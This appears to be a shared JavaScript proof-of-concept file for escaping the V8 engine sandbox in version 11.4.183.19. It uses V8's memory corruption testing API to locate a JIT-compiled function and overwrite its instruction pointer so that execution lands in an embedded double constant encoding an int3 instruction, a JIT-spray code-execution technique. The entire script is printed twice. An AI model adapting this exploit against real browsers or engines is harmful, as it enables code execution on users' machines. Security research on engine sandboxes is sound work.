mistymntncop/v8sbx.js

## v8sbx.js
//v8 version 11.4.183.19
//git checkout 56e5481171da3eacd3cb83db2be3b2d2b96b4abb
//MODIFY BUILD.gn in the root v8 folder to enable the memory corruption api
//v8_expose_memory_corruption_api = true
//ninja -C ./out/x64.debug d8
//ninja -C ./out/x64.release d8


const addr_of = (o) => {
    return Sandbox.getAddressOf(o);
};

const weak_read32 = (p) => {
    let reader = new Sandbox.MemoryView(p, 32);
    let view = new DataView(reader);
    return view.getUint32(0, true);
};

const weak_read64 = (p) => {
    let reader = new Sandbox.MemoryView(p, 64);
    let view = new DataView(reader);
    return view.getBigUint64(0, true);
};

const weak_write32 = (p, x) => {
    let writer = new Sandbox.MemoryView(p, 32);
    let view = new DataView(writer);
    view.setUint32(0, x, true);
};

const weak_write64 = (p, x) => {
    let writer = new Sandbox.MemoryView(p, 64);
    let view = new DataView(writer);
    view.setBigUint64(0, x, true);
};

//1.01e-321 = 0x00000000000000CC (int3)
function jit_me() {
    return [1.01e-321, 2.2, 3.3, 4.4];
}

for (let i = 0; i < 0x3000; i++) {
    jit_me();
    jit_me();
}
%DebugPrint(jit_me);

let jim_me_addr = addr_of(jit_me);
let code_struct_addr = weak_read32(jim_me_addr + 0x18);
let instruction_start_addr = code_struct_addr-1 + 0x10;
let instruction_start = weak_read64(instruction_start_addr);
//const offset_to_constant = 0x6Dn + 2n; //debug
const offset_to_constant = 0x54n + 2n; //release
let new_instruction_start = instruction_start + offset_to_constant;

%GlobalPrint("jim_me_addr = " + jim_me_addr.toString(16) + "\n");
%GlobalPrint("code_struct_addr = " + code_struct_addr.toString(16) + "\n");
%GlobalPrint("instruction_start_addr = " + instruction_start_addr.toString(16) + "\n");
%GlobalPrint("instruction_start = " + instruction_start.toString(16) + "\n");
%GlobalPrint("new_instruction_start = " + new_instruction_start.toString(16) + "\n");

weak_write64(instruction_start_addr, new_instruction_start);
jit_me();
	//v8 version 11.4.183.19
	//git checkout 56e5481171da3eacd3cb83db2be3b2d2b96b4abb
	//MODIFY BUILD.gn in the root v8 folder to enable the memory corruption api
	//v8_expose_memory_corruption_api = true
	//ninja -C ./out/x64.debug d8
	//ninja -C ./out/x64.release d8


	const addr_of = (o) => {
	return Sandbox.getAddressOf(o);
	};

	const weak_read32 = (p) => {
	let reader = new Sandbox.MemoryView(p, 32);
	let view = new DataView(reader);
	return view.getUint32(0, true);
	};

	const weak_read64 = (p) => {
	let reader = new Sandbox.MemoryView(p, 64);
	let view = new DataView(reader);
	return view.getBigUint64(0, true);
	};

	const weak_write32 = (p, x) => {
	let writer = new Sandbox.MemoryView(p, 32);
	let view = new DataView(writer);
	view.setUint32(0, x, true);
	};

	const weak_write64 = (p, x) => {
	let writer = new Sandbox.MemoryView(p, 64);
	let view = new DataView(writer);
	view.setBigUint64(0, x, true);
	};

	//1.01e-321 = 0x00000000000000CC (int3)
	function jit_me() {
	return [1.01e-321, 2.2, 3.3, 4.4];
	}

	for (let i = 0; i < 0x3000; i++) {
	jit_me();
	jit_me();
	}
	%DebugPrint(jit_me);

	let jim_me_addr = addr_of(jit_me);
	let code_struct_addr = weak_read32(jim_me_addr + 0x18);
	let instruction_start_addr = code_struct_addr-1 + 0x10;
	let instruction_start = weak_read64(instruction_start_addr);
	//const offset_to_constant = 0x6Dn + 2n; //debug
	const offset_to_constant = 0x54n + 2n; //release
	let new_instruction_start = instruction_start + offset_to_constant;

	%GlobalPrint("jim_me_addr = " + jim_me_addr.toString(16) + "\n");
	%GlobalPrint("code_struct_addr = " + code_struct_addr.toString(16) + "\n");
	%GlobalPrint("instruction_start_addr = " + instruction_start_addr.toString(16) + "\n");
	%GlobalPrint("instruction_start = " + instruction_start.toString(16) + "\n");
	%GlobalPrint("new_instruction_start = " + new_instruction_start.toString(16) + "\n");

	weak_write64(instruction_start_addr, new_instruction_start);
	jit_me();